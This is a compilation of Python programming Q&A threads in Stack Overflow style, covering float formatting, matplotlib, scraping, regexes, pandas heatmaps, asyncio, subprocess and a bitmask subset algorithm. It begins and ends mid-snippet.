clean_data = str(row_data).replace('<td style="color:Black;background-color:LightSkyBlue;border-color:LightSkyBlue;font-size:12pt;font-weight:normal;">','')\
.replace('</td>','')
print('\n'.join([x for x in clean_data.split('<br/>') if x != '']))
"""
Generated output:
Root Cause: Hardware Failure
Action Completed: Power supply/filter/cable swap
Arrival Time: 02/01/2014 15:54:17
Leaving Time: 02/01/2014 16:27:44
Was the job successful: Yes
Notes:replaced dsl cable and filter. Also rebooted all equipment. All working fine now.
Next Action required:none
Added by jakubkwasny at 02/01/2014 21:41:40
Pinging 99.99.99.99 with 32 bytes of data:
Reply from 99.99.99.99: bytes=32 time=67ms TTL=240
Reply from 99.999.999.99: bytes=32 time=92ms TTL=240
Reply from 99.99.65.65: bytes=32 time=76ms TTL=240
Reply from 67.45.32.12: bytes=32 time=82ms TTL=240
Ping statistics for 12.12.12.12:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 67ms, Maximum = 92ms, Average = 79ms
"""
|
Convert float to string without scientific notation and false precision
Question: I want to print some floating point numbers so that they're always written in
decimal form (e.g. `12345000000000000000000.0` or `0.000000000000012345`, not
in [scientific notation](https://en.wikipedia.org/wiki/Scientific_notation)),
yet I'd want to keep the 15.7 decimal digits of precision and no more.
It is well-known that the `repr` of a `float` is written in scientific
notation if the exponent is greater than 15, or less than -4:
>>> n = 0.000000054321654321
>>> n
5.4321654321e-08 # scientific notation
If `str` is used, the resulting string again is in scientific notation:
>>> str(n)
'5.4321654321e-08'
* * *
It has been suggested that I can use `format` with `f` flag and sufficient
precision to get rid of the scientific notation:
>>> format(0.00000005, '.20f')
'0.00000005000000000000'
It works for that number, though it has some extra trailing zeroes. But then
the same format fails for `.1`, which gives decimal digits beyond the actual
machine precision of float:
>>> format(0.1, '.20f')
'0.10000000000000000555'
And if my number is `4.5678e-20`, using `.20f` would still lose relative
precision:
>>> format(4.5678e-20, '.20f')
'0.00000000000000000005'
Thus **these approaches do not match my requirements**.
* * *
This leads to the question: what is the easiest and also well-performing way
to print arbitrary floating point number in decimal format, having the same
digits as in [`repr(n)` (or `str(n)` on Python
3)](http://stackoverflow.com/a/28493269/918959), but always using the decimal
format, not the scientific notation.
That is, a function or operation that for example converts the float value
`0.00000005` to string `'0.00000005'`; `0.1` to `'0.1'`;
`420000000000000000.0` to `'420000000000000000.0'` or `420000000000000000` and
formats the float value `-4.5678e-5` as `'-0.000045678'`.
* * *
After the bounty period: It seems that there are at least 2 viable approaches,
as Karin demonstrated that using string manipulation one can achieve
significant speed boost compared to my initial algorithm on Python 2.
Thus,
* If performance is important and Python 2 compatibility is required; or if the `decimal` module cannot be used for some reason, then [Karin's approach using string manipulation](http://stackoverflow.com/a/38983595/918959) is the way to do it.
* On Python 3, [my somewhat shorter code will also be faster](http://stackoverflow.com/a/38847691/918959).
Since I am primarily developing on Python 3, I will accept my own answer, and
shall award Karin the bounty.
Answer: Unfortunately it seems that not even the new-style formatting with
`float.__format__` supports this. The default formatting of `float`s is the
same as with `repr`; and with `f` flag there are 6 fractional digits by
default:
>>> format(0.0000000005, 'f')
'0.000000'
* * *
However there is a hack to get the desired result - not the fastest one, but
relatively simple:
* first the float is converted to a string using `str()` or `repr()`
* then a new [`Decimal`](https://docs.python.org/3/library/decimal.html#decimal.Decimal) instance is created from that string.
* `Decimal.__format__` supports `f` flag which gives the desired result, and, unlike `float`s it prints the actual precision instead of default precision.
Thus we can make a simple utility function `float_to_str`:
import decimal
# create a new context for this task
ctx = decimal.Context()
# 20 digits should be enough for everyone :D
ctx.prec = 20
def float_to_str(f):
"""
Convert the given float to a string,
without resorting to scientific notation
"""
d1 = ctx.create_decimal(repr(f))
return format(d1, 'f')
Care must be taken not to use the global decimal context, so a new context is
constructed for this function. This is the fastest way; another way would be
to use `decimal.localcontext`, but it would be slower, creating a new thread-
local context and a context manager for each conversion.
This function now returns the string with all possible digits from mantissa,
rounded to the [shortest equivalent
representation](http://stackoverflow.com/a/28493269/918959):
>>> float_to_str(0.1)
'0.1'
>>> float_to_str(0.00000005)
'0.00000005'
>>> float_to_str(420000000000000000.0)
'420000000000000000'
>>> float_to_str(0.000000000123123123123123123123)
'0.00000000012312312312312313'
The last result is rounded at the last digit
As @Karin noted, `float_to_str(420000000000000000.0)` does not strictly match
the format expected; it returns `420000000000000000` without trailing `.0`.
|
Importing pyplot in a Jupyter Notebook
Question: Running Python 2.7 and trying to get plotting to work, the tutorials recommend
the command below.
from matplotlib import pyplot as plt
Works fine when run from the command line
python -c "from matplotlib import pyplot as plt"
but I get an error when trying to run it inside a Jupyter Notebook.
---------------------------------------------------------------------------
ImportError Traceback (most recent call last)
<ipython-input-21-1d1446f6fa64> in <module>()
----> 1 from matplotlib import pyplot as plt
/usr/local/lib/python2.7/dist-packages/matplotlib/pyplot.py in <module>()
112
113 from matplotlib.backends import pylab_setup
--> 114 _backend_mod, new_figure_manager, draw_if_interactive, _show = pylab_setup()
115
116 _IP_REGISTERED = None
/usr/local/lib/python2.7/dist-packages/matplotlib/backends/__init__.pyc in pylab_setup()
30 # imports. 0 means only perform absolute imports.
31 backend_mod = __import__(backend_name,
---> 32 globals(),locals(),[backend_name],0)
33
34 # Things we pull in from all backends
/usr/local/lib/python2.7/dist-packages/ipykernel/pylab/backend_inline.py in <module>()
154 configure_inline_support(ip, backend)
155
--> 156 _enable_matplotlib_integration()
/usr/local/lib/python2.7/dist-packages/ipykernel/pylab/backend_inline.py in _enable_matplotlib_integration()
152 backend = get_backend()
153 if ip and backend == 'module://%s' % __name__:
--> 154 configure_inline_support(ip, backend)
155
156 _enable_matplotlib_integration()
/usr/local/lib/python2.7/dist-packages/IPython/core/pylabtools.pyc in configure_inline_support(shell, backend)
359 except ImportError:
360 return
--> 361 from matplotlib import pyplot
362
363 cfg = InlineBackend.instance(parent=shell)
ImportError: cannot import name pyplot
The following command works
import matplotlib
But the following gives me a similar error
import matplotlib.pyplot
Answer: You can also use the `%matplotlib inline` magic, but it has to be preceded by
the pure `%matplotlib` line:
**Works (figures in new window)**
%matplotlib
import matplotlib.pyplot as plt
**Works (inline figures)**
%matplotlib
%matplotlib inline
import matplotlib.pyplot as plt
**Does not work**
%matplotlib inline
import matplotlib.pyplot as plt
Also: [Failure to import matplotlib.pyplot in jupyter (but not
ipython)](http://stackoverflow.com/questions/38838914/failure-to-import-
matplotlib-pyplot-in-jupyter-but-not-ipython) seems to be the same issue. It
looks like a recently introduced bug in the ipykernel. Maybe someone can mark
this or the other question as a duplicate, thanks.
|
How to jump on specific Page usinig Beautifulsoup
Question: I want to get data in Python for a product searched for by the user. I am able
to get data from any URL, but I want to jump to the page matching the user's
search and get the data using BeautifulSoup.
I tried this to get the data:
from bs4 import BeautifulSoup
import requests
import urllib2
url="http://amazon.in"
con=urllib2.urlopen(url).read()
soup=BeautifulSoup(con)
print soup.prettify()
But if the user wants the price of an iPhone 5s, the script should jump to that
product's page and get the data.
How do I do this?
Answer: You just need to do a get request passing the correct params:
import requests
from bs4 import BeautifulSoup
params = {"url":"search-alias=aps","field-keywords":"iphone 5"}
url = "http://www.amazon.in/s/ref=nb_sb_noss_2"
soup = BeautifulSoup(requests.get(url, params=params).content)
ul = soup.select_one("#s-results-list-atf")
`ul` will contain all the search results you see on the page. If we run the
code and find the h2 tags inside each anchor, we can see the item
name/description as it appears on the page:
In [6]: ul = soup.select_one("#s-results-list-atf")
In [7]: for h2 in ul.select("li a h2"):
...: print(h2.text)
...:
Apple iPhone 5s (Space Grey, 16GB)
Apple iPhone 5s (Silver, 16GB)
Supra Lightning 8 Pin To Micro Usb Charge Sync Data Connector Adapter Iphone 5 Ipad 4
OnePlus 3 (Graphite, 64GB)
Apple iPhone 5 (Black-Slate, 16GB)
ROCK 695029068729 Royce Series Shockproof Dual Layer Back Case Cover for Apple iPhone 5 5S,(Grey)
Apple iPhone 5c (White, 8GB)
iSAVE Soft Silicone Grid Design Back Case Cover For iPhone 5/5s (BLACK)
iPaky AT15312 360 Protective Body Case with Tempered Glass for Apple iPhone SE 5 5S,(Black)
Aeoss 9Pcs Open Pry Screwdriver Repair Tool Kit Set For iPhone 6 Plus 5 5s 5c 4 iPod.
2 IN 1 Tempered Glass for Iphone 5 5s 5c Explosion Proof Tempered Glass (FRONT AND BACK)
Itab iphone5sclearsoftgelly Imported Transparent Clear Silicone Jelly Soft Case Back Cover For Apple Iphone 5 5S
Shivam Earphones EarPods Handsfree Headphones for Apple iPhone 4/4s/5/5s/6/6+ (White)
USB Power Adapter Wall Charger&Data Cable for iPhone 5/5S/5C/6
Generic Ios 7 Compatible Data Sync Charging Cable For Apple Iphone 5 5S 6 - White
Tempered Glass Screen Protector Scratch Guard for Apple Iphone 5 5G 5s
|
Using sed to interpret multiple lines on condition
Question: I'm stuck on constructing a **sed** expression that will parse a Python file's
imports and extract the names of the modules.
Here is a simple example that I solved (I need the output to be the
module names, without 'as' or any spaces):
What I have so far:
grep -ir "from testfunctions import" */*.py | sed -E s/'\s+as\s+\w+'//g | sed -E s/'from testfunctions import\s+'//g
This does get me the required result in a situation as above.
**The problem:** In files where the imports are like so:
from testfunctions import mod1, mod2 as blala, mod3, mod4 \
mod5, mod6 as bla, mod7 \
mod8, mod9 ...
**Any ideas how I can improve my piped expression to handle multiple lines?**
Answer: Try this:
    sed -n -r '/from/,/^\s*$/p;' *.py | sed ':x; /\\$/ { N; s/\\\n//; tx }' | sed 's/^.*.import//g;s/ */ /g'
The first stage prints each block from a line containing `from` up to the next
blank line, the second joins backslash-continued lines, and the third strips
everything up to `import` and squeezes the spaces.
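Since the files being scanned are Python anyway, a pure-Python sketch of the
same extraction (joining the backslash-continued lines first) may be easier to
maintain:
    import re

    with open('yourfile.py') as f:
        src = f.read().replace('\\\n', ' ')  # merge backslash-continued lines

    for match in re.finditer(r'from testfunctions import\s+(.+)', src):
        # split the import list and drop any "as alias" part
        modules = [part.split(' as ')[0].strip()
                   for part in match.group(1).split(',')]
        print(modules)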
|
HeatMap visualization
Question: I have a dataframe df1
df1.info()
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 38840 entries, 0 to 38839
Data columns (total 7 columns):
TIMESTAMP 38840 non-null datetime64[ns]
ACT_TIME_AERATEUR_1_F1 38696 non-null float64
ACT_TIME_AERATEUR_1_F3 38697 non-null float64
ACT_TIME_AERATEUR_1_F5 38695 non-null float64
ACT_TIME_AERATEUR_1_F6 38695 non-null float64
ACT_TIME_AERATEUR_1_F7 38693 non-null float64
ACT_TIME_AERATEUR_1_F8 38696 non-null float64
dtypes: datetime64[ns](1), float64(6)
memory usage: 2.1 MB
which looks like this :
TIMESTAMP ACT_TIME_AERATEUR_1_F1 ACT_TIME_AERATEUR_1_F3 ACT_TIME_AERATEUR_1_F5 ACT_TIME_AERATEUR_1_F6 ACT_TIME_AERATEUR_1_F7
ACT_TIME_AERATEUR_1_F8
2015-08-01 05:10:00 100 100 100 100 100 100
2015-08-01 05:20:00 100 100 100 100 100 100
2015-08-01 05:30:00 100 100 100 100 100 100
2015-08-01 05:40:00 100 100 100 100 100 100
I am trying to create a heatmap with seaborn to visualize data that lies
between two dates (for example, here between '2015-08-01 23:10:00' and
'2015-08-02 02:00:00'). I do it like this:
df1['TIMESTAMP']= pd.to_datetime(df_no_missing['TIMESTAMP'], '%d-%m-%y %H:%M:%S')
df1['date'] = df_no_missing['TIMESTAMP'].dt.date
df1['time'] = df_no_missing['TIMESTAMP'].dt.time
date_debut = pd.to_datetime('2015-08-01 23:10:00')
date_fin = pd.to_datetime('2015-08-02 02:00:00')
df1 = df1[(df1['TIMESTAMP'] >= date_debut) & (df1['TIMESTAMP'] < date_fin)]
sns.heatmap(df1.iloc[:,1:6:],annot=True, linewidths=.5)
I got a heatmap like the one attached:
![enter image description here](http://i.stack.imgur.com/KnWie.png)
My question now is: how can I replace the numbers on the left of the heatmap
(145...161) with their corresponding timestamp values (2015-08-01 05:10:00,
2015-08-01 05:20:00, 2015-08-01 05:30:00, ...)?
Thank you.
I tried to make the modifications:
df1.set_index("TIMESTAMP", inplace=1)
sns.heatmap(df1.iloc[:, 1:6:], annot=True, linewidths=.5)
ax = plt.gca()
ax.set_yticklabels([i.strftime("%Y-%m-%d %H:%M:%S") for i in df1.TIMESTAMP], rotation=0)
**EDIT**
But I get errors and warnings:
    C:\Users\Demonstrator\Anaconda3\lib\site-packages\ipykernel\__main__.py:2: SettingWithCopyWarning:
    A value is trying to be set on a copy of a slice from a DataFrame.
    Try using .loc[row_indexer,col_indexer] = value instead

    See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
      from ipykernel import kernelapp as app
    C:\Users\Demonstrator\Anaconda3\lib\site-packages\ipykernel\__main__.py:3: SettingWithCopyWarning:
    A value is trying to be set on a copy of a slice from a DataFrame.
    Try using .loc[row_indexer,col_indexer] = value instead

    See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
      app.launch_new_instance()
    C:\Users\Demonstrator\Anaconda3\lib\site-packages\ipykernel\__main__.py:4: SettingWithCopyWarning:
    A value is trying to be set on a copy of a slice from a DataFrame.
    Try using .loc[row_indexer,col_indexer] = value instead

    See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy

    ---------------------------------------------------------------------------
    ValueError                                Traceback (most recent call last)
    <ipython-input-129-cec498d88cac> in <module>()
          9
         10 #sns.heatmap(df1.iloc[:,1:6:],annot=True, linewidths=.5)
    ---> 11 sns.heatmap(df1.iloc[:, 1:6:], annot=True, linewidths=.5)
         12 ax = plt.gca()
         13 ax.set_yticklabels([i.strftime("%Y-%m-%d %H:%M:%S") for i in df1.TIMESTAMP], rotation=0)

    C:\Users\Demonstrator\Anaconda3\lib\site-packages\seaborn\matrix.py in heatmap(data, vmin, vmax, cmap, center, robust, annot, fmt, annot_kws, linewidths, linecolor, cbar, cbar_kws, cbar_ax, square, ax, xticklabels, yticklabels, mask, **kwargs)
        483     plotter = _HeatMapper(data, vmin, vmax, cmap, center, robust, annot, fmt,
        484                           annot_kws, cbar, cbar_kws, xticklabels,
    --> 485                           yticklabels, mask)
        486
        487     # Add the pcolormesh kwargs here

    C:\Users\Demonstrator\Anaconda3\lib\site-packages\seaborn\matrix.py in __init__(self, data, vmin, vmax, cmap, center, robust, annot, fmt, annot_kws, cbar, cbar_kws, xticklabels, yticklabels, mask)
        165         # Determine good default values for the colormapping
        166         self._determine_cmap_params(plot_data, vmin, vmax,
    --> 167                                     cmap, center, robust)
        168
        169         # Sort out the annotations

    C:\Users\Demonstrator\Anaconda3\lib\site-packages\seaborn\matrix.py in _determine_cmap_params(self, plot_data, vmin, vmax, cmap, center, robust)
        204         calc_data = plot_data.data[~np.isnan(plot_data.data)]
        205         if vmin is None:
    --> 206             vmin = np.percentile(calc_data, 2) if robust else calc_data.min()
        207         if vmax is None:
        208             vmax = np.percentile(calc_data, 98) if robust else calc_data.max()

    C:\Users\Demonstrator\Anaconda3\lib\site-packages\numpy\core\_methods.py in _amin(a, axis, out, keepdims)
         27
         28 def _amin(a, axis=None, out=None, keepdims=False):
    ---> 29     return umr_minimum(a, axis, None, out, keepdims)
         30
         31 def _sum(a, axis=None, dtype=None, out=None, keepdims=False):

    ValueError: zero-size array to reduction operation minimum which has no identity
@jeanrjc, look at the last image; there is a problem: the image is too small
and there are two vertical lines (scales) on the right. I hope I am clear
now.[![enter image description
here](http://i.stack.imgur.com/yNrA8.png)](http://i.stack.imgur.com/yNrA8.png)
Answer: It's because `TIMESTAMP` is not your index, from the `sns.heatmap` docstring:
> yticklabels : list-like, int, or bool, optional If True, plot the row names
> of the dataframe. If False, don't plot the row names. If list-like, plot
> these alternate labels as the yticklabels. If an integer, use the index
> names but plot only every n label.
The row names being the index.
So you can just set your index accordingly:
df1.set_index("TIMESTAMP", inplace=1)
and with your `sns` command it will work almost fine. The problem is that
you'll have an ugly representation of the date.
Alternatively, **instead of changing the index**, you can do:
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
...
...
ax = sns.heatmap(df1.iloc[:, 1:6:], annot=True, linewidths=.5)
ax.set_yticklabels([i.strftime("%Y-%m-%d %H:%M:%S") for i in df1.TIMESTAMP], rotation=0)
HTH
|
Monitoring the asyncio event loop
Question: I am writing an application using python3 and am trying out asyncio for the
first time. One issue I have encountered is that some of my coroutines block
the event loop for longer than I like. I am trying to find something along the
lines of top for the event loop that will show how much wall/cpu time is being
spent running each of my coroutines. If there isn't anything already existing
does anyone know of a way to add hooks to the event loop so that I can take
measurements?
I have tried using cProfile which gives some helpful output, but I am more
interested in time spent blocking the event loop, rather than total execution
time.
Answer: The event loop can already track whether coroutines take too much CPU time to execute. To
see it you should [enable debug
mode](https://docs.python.org/3/library/asyncio-
eventloop.html#asyncio.AbstractEventLoop.set_debug) with `set_debug` method:
import asyncio
import time
async def main():
time.sleep(1) # Block event loop
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.set_debug(True) # Enable debug
loop.run_until_complete(main())
In output you'll see:
Executing <Task finished coro=<main() [...]> took 1.016 seconds
By default it shows warnings for coroutines that blocks for more than 0.1 sec.
It's not documented, but based on asyncio [source
code](https://github.com/python/asyncio/blob/master/asyncio/base_events.py#L240),
looks like you can change `slow_callback_duration` attribute to modify this
value.
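A short sketch combining both knobs (keeping in mind `slow_callback_duration`
is undocumented and may change between versions):
    loop = asyncio.get_event_loop()
    loop.set_debug(True)
    # undocumented: lower the warning threshold from the default 0.1 s to 50 ms
    loop.slow_callback_duration = 0.05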
|
Make a list of every column in a file in Python
Question: I would like to create a list for every column in a txt file. The file looks
like this:
    NAME S1 S2 S3 S4
    A    1  4  3  1
    B    2  1  2  6
    C    2  1  3  5
PROBLEM 1. How do I dynamically create the number of lists that fits the number
of columns, such that I can fill them? In some files I will have 4 columns;
in others, 6 or 8...
PROBLEM 2. What is a pythonic way to iterate through each column and make a
list of the values like this:
list_s1 = [1,2,2]
list_s2 = [4,1,1]
etc.
Right now I have read in the txt file and I have each individual line. As
input I give the number of NAMES in a file (here HOW_MANY_SAMPLES = 4)
def parse_textFile(file):
list_names = []
with open(file) as f:
header = f.next()
head_list = header.rstrip("\r\n").split("\t")
for i in f:
e = i.rstrip("\r\n").split("\t")
list_names.append(e)
for i in range(1, HOW_MANY_SAMPLES):
l+i = []
l+i.append([a[i] for a in list_names])
I need a dynamic way of creating and filling the number of lists that
corresponds to the number of columns in my table.
Answer: ## Problem 1:
You can use `len(head_list)` instead of having to specify `HOW_MANY_SAMPLES`.
You can also try using [Python's CSV
module](https://docs.python.org/3/library/csv.html) and setting the delimiter
to a space or a tab instead of a comma.
See [this answer to a similar StackOverflow
question](http://stackoverflow.com/a/8859304/3199915).
## Problem 2:
Once you have a list representing each row, you can use `zip` to create lists
representing each column: See [this
answer](http://stackoverflow.com/a/20279160/3199915).
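For instance, a minimal sketch of that zip-based transposition, assuming
whitespace-separated columns:
    # transpose the row lists into column lists
    with open('data.txt') as f:
        rows = [line.split() for line in f if line.strip()]

    header = rows[0]                      # ['NAME', 'S1', 'S2', 'S3', 'S4']
    columns = dict(zip(header, zip(*rows[1:])))
    print(columns['S1'])                  # ('1', '2', '2')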
With the CSV module, you can [follow this
suggestion](http://stackoverflow.com/a/29082892/3199915), which is another way
to invert the data from row-based lists to column-based lists.
## Sample:
import csv
# open the file in universal line ending mode
with open('data.txt', 'rU') as infile:
# register a dialect that skips extra whitespace
csv.register_dialect('ignorespaces', delimiter=' ', skipinitialspace=True)
# read the file as a dictionary for each row ({header : value})
reader = csv.DictReader(infile, dialect='ignorespaces')
data = {}
for row in reader:
for header, value in row.items():
try:
if (header):
data[header].append(value)
except KeyError:
data[header] = [value]
for column in data.keys():
print (column + ": " + str(data[column]))
this yields:
S2: ['4', '1', '1']
S1: ['1', '2', '2']
S3: ['3', '2', '3']
S4: ['1', '6', '5']
NAME: ['A', 'B', 'C']
|
How to use subprocess to interact with a python script
Question: I'm writing an IDE for Python, in Python, and need to use subprocess to
interact with a user's script.
I am completely new to using subprocess and am not sure what I'm doing here.
I've created a test snippet representing what I'm trying to do:
from subprocess import Popen,PIPE,STDOUT
import tkinter as tk
t=tk.Text()
t.pack()
p = Popen(["python","c:/runme.py"],stdout=PIPE,stdin=PIPE,stderr=PIPE,shell=True)
p.stdin.write("5".encode())
out=p.stdout.read()
t.insert(1.0,out)
And here is the test script I'm trying to interact with:
print("Hello World")
inp=input("Enter a Number: ")
print(inp)
quit()
Unfortunately it just waits (presumably) on line 2. How do I read what has
already been printed, and how do I then input the string?
Answer: You have to flush stdout regularly, because, if the script is not connected to
a terminal, the output is not automatically flushed:
    import sys
    print("Hello World")
    print("Enter a Number: ")
    sys.stdout.flush()  # flush explicitly: stdout is block-buffered on a pipe
    inp = input()
    print(inp)
and you have to terminate the input with a newline `\n`:
p = Popen(["python", "c:/runme.py"], stdout=PIPE, stdin=PIPE, stderr=PIPE)
p.stdin.write("5\n".encode())
out = p.stdout.read()
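For a one-shot exchange like this, `communicate` is a simpler sketch: it writes
the input, closes stdin, and reads both streams to the end, avoiding pipe
deadlocks:
    p = Popen(["python", "c:/runme.py"], stdout=PIPE, stdin=PIPE, stderr=PIPE)
    out, err = p.communicate("5\n".encode())
    t.insert(1.0, out)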
|
Regular expressions in python to match Twitter handles
Question: I'm trying to use regular expressions to capture all Twitter handles within a
tweet body. The challenge is that I'm trying to get handles that
1. Contain a specific string
2. Are of unknown length
3. May be followed by either
* punctuation
* whitespace
* or the end of string.
For example, for each of these strings, I've marked _in italics_ what I'd
like to return.
> "@handle what is your problem?" _[RETURN '@handle']_
>
> "what is your problem @handle?" _[RETURN '@handle']_
>
> "@123handle what is your problem @handle123?" _[RETURN '@123handle',
> '@handle123']_
This is what I have so far:
>>> import re
>>> re.findall(r'(@.*handle.*?)\W','hi @123handle, hello @handle123')
['@123handle']
# This misses the handles that are followed by end-of-string
I tried modifying to include an `or` character allowing the end-of-string
character. Instead, it just returns the whole string.
>>> re.findall(r'(@.*handle.*?)(?=\W|$)','hi @123handle, hello @handle123')
['@123handle, hello @handle123']
# This looks like it is too greedy and ends up returning too much
How can I write an expression that will satisfy both conditions?
I've looked at a [couple](http://stackoverflow.com/questions/16932012/regex-
how-to-match-any-string-until-whitespace-or-until-punctuation-followed-b)
[other](http://stackoverflow.com/questions/6713310/how-to-specify-space-or-
end-of-string-and-space-or-start-of-string) places, but am still stuck.
Answer: It seems you are trying to match strings starting with `@`, then having 0+
word chars, then `handle`, and then again 0+ word chars.
Use
r'@\w*handle\w*'
or - to avoid matching `@`+word chars in emails:
r'\B@\w*handle\w*'
See the [Regex 1 demo](https://regex101.com/r/jW4xL1/1) and the [Regex 2
demo](https://regex101.com/r/jW4xL1/2) (the `\B` non-word boundary requires a
non-word char or start of string to be right before the `@`).
Note that the `.*` is a greedy dot matching pattern that matches any
characters other than newline, as many as possible. `\w*` only matches 0+
characters (also as many as possible) but from the `[a-zA-Z0-9_]` set if the
`re.UNICODE` flag is not used (and it is not used in your code).
[Python demo](http://ideone.com/T1bZx4):
import re
p = re.compile(r'@\w*handle\w*')
test_str = "@handle what is your problem?\nwhat is your problem @handle?\n@123handle what is your problem @handle123?\n"
print(p.findall(test_str))
# => ['@handle', '@handle', '@123handle', '@handle123']
|
get Json data from request with Django
Question: I'm trying to develop a very simple script in Django: it collects JSON data
from the request and then stores all the data in the database.
I developed a Python script that I'm using to send the JSON data to the
Django view, but I'm doing something wrong and I can't understand what,
because every time I run it I get "Malformed data!".
Can someone help me? What am I doing wrong?
Sender.py
import json
import urllib2
data = {
'ids': ["milan", "rome","florence"]
}
req = urllib2.Request('http://127.0.0.1:8000/value/')
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(data))
Django view.py
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
import json
from models import *
from django.http import StreamingHttpResponse
from django.views.decorators.csrf import csrf_exempt
@csrf_exempt
def value(request):
try:
data = json.loads(request.body)
label = data['label']
url = data ['url']
print label, url
except:
return HttpResponse("Malformed data!")
return HttpResponse("Got json data")
Answer: Your dictionary `data` in sender.py contains only one value, with key `"ids"`,
but in view.py you are trying to access the keys `"label"` and `"url"` in the
parsed dictionary.
|
Using python regex to find repeated values after a header
Question: If I have a string that looks something like:
s = """
...
Random Stuff
...
HEADER
a 1
a 3
# random amount of rows
a 17
RANDOM_NEW_HEADER
a 200
a 300
...
More random stuff
...
"""
Is there a clean way to use regex (in Python) to find all instances of `a \d*`
after HEADER, but before the pattern is broken by SOMETHING_TOTALLY_DIFFERENT?
I thought about something like:
import re
pattern = r'HEADER(?:\na \d*)*\na (\d*)'
print re.findall(pattern, s)
Unfortunately, regex doesn't find overlapping matches. If there's no sensible
way to do this with regex, I'm okay with anything faster than writing my own
for loop to extract this data.
(TL;DR -- There's a distinct header, followed by a pattern that repeats. I
want to catch each instance of that pattern, as long as there isn't a break in
the repetition.)
EDIT:
To clarify, I don't necessarily know what SOMETHING_TOTALLY_DIFFERENT will be,
only that it won't match `a \d+`. I want to collect all consecutive instances
of `\na \d+` that follow `HEADER\n`.
Answer: How about a simple loop?
import re
e = re.compile(r'(a\s+\d+)')
header = 'whatever your header field is'
breaker = 'something_different'
breaker_reached = False
header_reached = False
results = []
    with open('yourfile.txt') as f:
        for line in f:
            line = line.rstrip('\n')  # drop the trailing newline before comparing
            if line == header:
# skip processing lines unless we reach the header
header_reached = True
continue
if header_reached:
i = e.match(line)
if i and not breaker_reached:
results.append(i.groups()[0])
else:
# There was no match, check if we reached the breaker
if line == breaker:
breaker_reached = True
|
Choosing python data structures to speed up algorithm implementation
Question: So I'm given a large collection (roughly 200k) of lists. Each contains a
subset of the numbers 0 through 27. I want to return two of the lists where
the product of their lengths is greater than the product of the lengths of any
other pair of lists. There's another condition, namely that the lists have no
numbers in common.
There's an algorithm I found for this (can't remember the source, apologies
for non-specificity of props) which exploits the fact that there are fewer
total subsets of the numbers 0 through 27 than there are words in the
dictionary.
The first thing I've done is looped through all the lists, found the unique
subset of integers that comprise it and indexed it as a number between 0 and
1<<28\. As follows:
def index_lists(lists):
index_hash = {}
        for raw_list in lists:
            length = len(raw_list)
            index = find_index(raw_list)  # compute the index before comparing
            if length > index_hash.get(index, {}).get("length", 0):
                index_hash[index] = {"list": raw_list, "length": length}
return index_hash
This gives me the longest list and the length of that list for each subset
that's actually contained in the collection of lists given. Naturally, not all
subsets from 0 to (1<<28)-1 are necessarily included, since there's no
guarantee the supplied collection has a list containing each unique subset.
What I then want, for each subset 0 through 1<<28 (all of them this time) is
the longest list that contains at most that subset. This is the part that is
killing me. At a high level, it should, for each subset, first check to see if
that subset is contained in the index_hash. It should then compare the length
of that entry in the hash (if it exists there) to the lengths stored
previously in the current hash for the current subset minus one number (this
is an inner loop 27 strong). The greatest of these is stored in this new hash
for the current subset of the outer loop. The code right now looks like this:
def at_most_hash(index_hash):
    most_hash = {}
    for i in xrange(1<<28): # pretty sure this is a bad idea
        max_entry = index_hash.get(i)
        if max_entry:
            max_length = max_entry["length"]
            max_list = max_entry["list"]
        else:
            max_length = 0
            max_list = []
        for j in xrange(28): # again, probably not great
            subset_index = i & ~(1<<j) # gets us a pre-computed subset
            at_most_entry = most_hash.get(subset_index, {})
            at_most_length = at_most_entry.get("length", 0)
            if at_most_length > max_length:
                max_length = at_most_length
                max_list = at_most_entry["list"]
        most_hash[i] = {"length": max_length, "list": max_list}
    return most_hash
This loop obviously takes several forevers to complete. I feel that I'm new
enough to python that my choice of how to iterate and what data structures to
use may have been completely disastrous. Not to mention the prospective memory
problems from attempting to fill the dictionary. Is there perhaps a better
structure or package to use as data structures? Or a better way to set up the
iteration? Or maybe I can do this more sparsely?
The next part of the algorithm just cycles through all the lists we were given, looks up each list's subset and its complementary subset in at_most_hash, multiplies the two max_lengths, and keeps the largest product.
Any suggestions here? I appreciate the patience for wading through my long-
winded question and less than decent attempt at coding this up.
In theory, this is still a better approach than working with the collection of lists alone, since the pairwise approach is roughly O(200k^2) while this one is roughly O(28 * 2^28 + 200k); yet my implementation is holding me back.
Answer: Given that your indexes are just ints, you could save some time and space by
using lists instead of dicts. I'd go further and bring in
[NumPy](http://www.numpy.org/) arrays. They offer compact storage
representation and efficient operations that let you implicitly perform
repetitive work in C, bypassing a ton of interpreter overhead.
Instead of `index_hash`, we start by building a NumPy array where
`index_array[i]` is the length of the longest list whose set of elements is
represented by `i`, or `0` if there is no such list:
import numpy
index_array = numpy.zeros(1<<28, dtype=int) # We could probably get away with dtype=int8.
for raw_list in lists:
i = find_index(raw_list)
index_array[i] = max(index_array[i], len(raw_list))
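(`find_index` isn't shown in the question; the code here assumes it packs each list into a 28-bit mask. A minimal sketch of such a helper:)

def find_index(raw_list):
    # hypothetical helper: bit n is set iff the number n (0-27) is in the list
    index = 0
    for n in raw_list:
        index |= 1 << n
    return index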
We then use NumPy operations to bubble up the lengths in C instead of
interpreted Python. Things might get confusing from here:
for bit_index in xrange(28):
index_array = index_array.reshape([1<<(28-bit_index), 1<<bit_index])
numpy.maximum(index_array[::2], index_array[1::2], out=index_array[1::2])
index_array = index_array.reshape([1<<28])
Each `reshape` call takes a new view of the array where data in even-numbered
rows corresponds to sets with the bit at `bit_index` clear, and data in odd-
numbered rows corresponds to sets with the bit at `bit_index` set. The
`numpy.maximum` call then performs the bubble-up operation for that bit. At
the end, each cell `index_array[i]` of `index_array` represents the length of
the longest list whose elements are a subset of set `i`.
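To see the reshape trick concretely, here is a toy run with 3 bits (8 subsets) instead of 28, using made-up lengths:

import numpy

a = numpy.array([0, 5, 2, 0, 1, 0, 0, 3])  # a[i] = best length for exact set i
for bit_index in xrange(3):
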